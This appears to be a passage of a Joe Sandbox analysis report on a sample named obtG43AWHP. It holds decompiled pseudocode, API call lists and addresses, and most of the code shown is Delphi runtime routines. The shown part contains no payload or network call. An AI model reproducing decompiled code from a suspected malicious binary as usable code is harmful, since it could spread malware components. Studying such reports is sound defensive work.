    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
